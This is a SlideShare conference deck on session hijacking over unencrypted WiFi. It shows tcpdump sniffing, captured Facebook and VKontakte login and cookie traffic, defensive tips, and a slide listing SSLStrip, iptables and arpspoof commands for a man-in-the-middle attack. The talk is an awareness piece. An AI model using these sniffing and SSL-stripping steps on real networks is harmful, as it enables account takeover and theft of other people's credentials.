session hijacking   for dummies  Friedemann Wulff-Woesten        WDCM Dresden             1
What is this all about?•   especially in the czech republic:    unencrypted WiFi everywhere•   Facebook    for many people...
What is this all about?•   this is a serious security threat•   tools are freely available, no one cares•   Facebook ignor...
HTTP is stateless• Request, Response• Send username/password once• Receive cookie• Use cookie for all future requests     ...
Cookies need to be kept       secret           5
6
7
even better: WiFi• Cookies shouted through the air• Someone just has to start listening                      8
let’s listen...imac:~ eisenrah$ sudo tcpdump -A -v -i en1 tcp port 80tcpdump: listening on en1, link-type EN10MB (Ethernet...
Example: RequestPOST /login.php?login_attempt=1 HTTP/1.1Host: login.facebook.comemail=e2@eisenrah.com&pass=ichmagdietu    ...
Example: ResponseHTTP/1.1 302 FoundLocation: http://www.facebook.com/home.php?Set-Cookie:xs=a1cac26e11645bca984ea98f98a6a1...
Problem: AJAXgenerate session cookies without clicking anywhere                        12
tcpdump: В Контакте17:18:32.656064 IP (tos 0x0, ttl 64, id 7684, offset 0, flags [DF], proto TCP (6), length 674)    imac.5...
tcpdump: Facebook21:39:06.513002 IP (tos 0x0, ttl 64, id 35287, offset 0, flags [DF], proto TCP (6), length 1306)    imac.5...
facebook.js changes         15
What can you do?• always full SSL - type https:// in address bar• click “Log out”  (doesnt guarantee session is invalidate...
Even worse• Facebook-Like Button,cookies sent with HTTP)  (included in many blogs -                            Tweet-Butto...
Example: SSLStripsudo -secho "1" > /proc/sys/net/ipv4/ip_forwardiptables -t nat -A PREROUTING -p tcp --destination-port 80...
friedemann@wulff-woesten.de http://wiki.eisenrah.com/wiki/Sessions                   19
@cdine@codebutler @eisenrah@moxie__     20
Sources•   elmo and cookie monster    http://1450knsi.com/assets/images/Elmo%20Cookie%20Monster.jpg•   wireshark collage  ...
Upcoming SlideShare
Loading in …5
×

Session hijacking for dummies

4,110 views

Published on

Published in: Technology, Design
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
4,110
On SlideShare
0
From Embeds
0
Number of Embeds
5
Actions
Shares
0
Downloads
56
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

Session hijacking for dummies

  1. 1. session hijacking for dummies Friedemann Wulff-Woesten WDCM Dresden 1
  2. 2. What is this all about?• especially in the czech republic: unencrypted WiFi everywhere• Facebook for many people THE platform to communicate• many mobile devices have Facebook Apps even more data = possibilities to attack• problem: almost no one types https:// browser always connects to Port 80 2
  3. 3. What is this all about?• this is a serious security threat• tools are freely available, no one cares• Facebook ignores the problem• Google went Full SSL 3
  4. 4. HTTP is stateless• Request, Response• Send username/password once• Receive cookie• Use cookie for all future requests 4
  5. 5. Cookies need to be kept secret 5
  6. 6. 6
  7. 7. 7
  8. 8. even better: WiFi• Cookies shouted through the air• Someone just has to start listening 8
  9. 9. let’s listen...imac:~ eisenrah$ sudo tcpdump -A -v -i en1 tcp port 80tcpdump: listening on en1, link-type EN10MB (Ethernet), capture size 65535 bytes[...]17:01:36.119066 IP (tos 0x0, ttl 64, id 45430, offset 0, flags [DF], proto TCP (6), length 102) imac.52070 > w9e.rzone.de.http: Flags [P.], cksum 0x3e95 (correct), seq 854:904, ack 1, win33120, options [nop,nop,TS val 709324897 ecr 1167316720], length 50E..f.v@.@.3.....Q....f.P.V.6)!y....`>......*GpaE...username=wdcmdd&password=meinsogeheimespasswort[...] 9
  10. 10. Example: RequestPOST /login.php?login_attempt=1 HTTP/1.1Host: login.facebook.comemail=e2@eisenrah.com&pass=ichmagdietu 10
  11. 11. Example: ResponseHTTP/1.1 302 FoundLocation: http://www.facebook.com/home.php?Set-Cookie:xs=a1cac26e11645bca984ea98f98a6a19c;path=/; domain=.facebook.com; httponly 11
  12. 12. Problem: AJAXgenerate session cookies without clicking anywhere 12
  13. 13. tcpdump: В Контакте17:18:32.656064 IP (tos 0x0, ttl 64, id 7684, offset 0, flags [DF], proto TCP (6), length 674) imac.52256 > srv64-131.vkontakte.ru.http: Flags [P.], cksum 0x84a6 (correct), seq 930:1552, ack 743, win 65535, options[nop,nop,TS val 710338737 ecr 2377981922], length 622E.....@.@..[....W..@. .P*......d...........*V......POST /im915 HTTP/1.1Host: q63.queue.vk.comConnection: keep-aliveReferer: http://q63.queue.vk.com/q_frame.php?3Content-Length: 307Origin: http://q63.queue.vk.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1Content-Type: application/x-www-form-urlencodedAccept: */*Accept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3Cookie: remixchk=5; remixlang=0;remixsid=2a72ff88d120569ae115f1e01885c5f14674dab175a1fb5392441d4e9840 13
  14. 14. tcpdump: Facebook21:39:06.513002 IP (tos 0x0, ttl 64, id 35287, offset 0, flags [DF], proto TCP (6), length 1306) imac.50781 > channel2-02-01-snc4.facebook.com.http: Flags [P.], cksum 0xca09 (correct), seq 1:1255, ack 263, win 32830, options[nop,nop,TS val 689948758 ecr 2100724491], length 1254E.....@.@.e@....B..$.].P..!p.......>. .....)..V}6..GET /x/4057007781/1328384618/true/p_100001070666929=23 HTTP/1.1Host: 0.44.channel.facebook.comConnection: keep-aliveReferer: http://0.44.channel.facebook.com/iframe/11?r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyX%2Fr%2Fimb8Z50C5TH.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyF%2Fr%2Fx3LLBUl8mEP.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyH%2Fr%2FwtfO3BqjZSC.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyz%2Fr%2FhFfiXiUF_l3.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyE%2Fr%2FSp2IUK7A8Z2.jsUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1Accept: */*Accept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3Cookie: c_user=100001070666929; datr=-J0UTvLh4Us6mmd4HoAFaYWl; L=2; lu=Rg43lZE4nMjM3vtnDl9S-BPw;sct=1312918035; xs=60%3A8a0d1e5b0344cca655fd1566026f513c; p=44;act=1312918349733%2F16;presence=EM312918690L44REp_5f1B01070666929F23X312918690038Y1312918638OQ0EsF0CEblFDacF19G312918689PEuoFD1B01609907228FDexpF1312918709806EflF_5b1_5dEolF0CE1B00195332181FDexpF13129187B69EflF_5b_5dEolF-1CCEalFD1B01609907228FDiF0EmF0CCCC; wd=840x952 14
  15. 15. facebook.js changes 15
  16. 16. What can you do?• always full SSL - type https:// in address bar• click “Log out” (doesnt guarantee session is invalidated)• use at least WPAII• use a VPN e.g. https://webvpn.zih.tu-dresden.de/ 16
  17. 17. Even worse• Facebook-Like Button,cookies sent with HTTP) (included in many blogs - Tweet-Buttons• dirty: active attack with SSLStrip (redirects every HTTPS request to HTTP) 17
  18. 18. Example: SSLStripsudo -secho "1" > /proc/sys/net/ipv4/ip_forwardiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000sslstrip -l 1000ip route show | grep default | awk { print $3}arpspoof <gatewayIP>ettercap -Tzq 18
  19. 19. friedemann@wulff-woesten.de http://wiki.eisenrah.com/wiki/Sessions 19
  20. 20. @cdine@codebutler @eisenrah@moxie__ 20
  21. 21. Sources• elmo and cookie monster http://1450knsi.com/assets/images/Elmo%20Cookie%20Monster.jpg• wireshark collage http://www.flickr.com/photos/43707902@N04/4022449442/ http://www.flickr.com/photos/43707902@N04/4022445684/ http://carlosadlrs.files.wordpress.com/2011/07/wireshark-logo.png• wireshark screenshot http://dump.taylor-hughes.com/wireshark-tadalist.png• firesheep facebook.js screenshot http://1.bp.blogspot.com/_BQgAZ7cjkHQ/TTbVkUVb4DI/AAAAAAAABcg/ NWl1KI5PCWA/s1600/Screenshot-9.png 21

×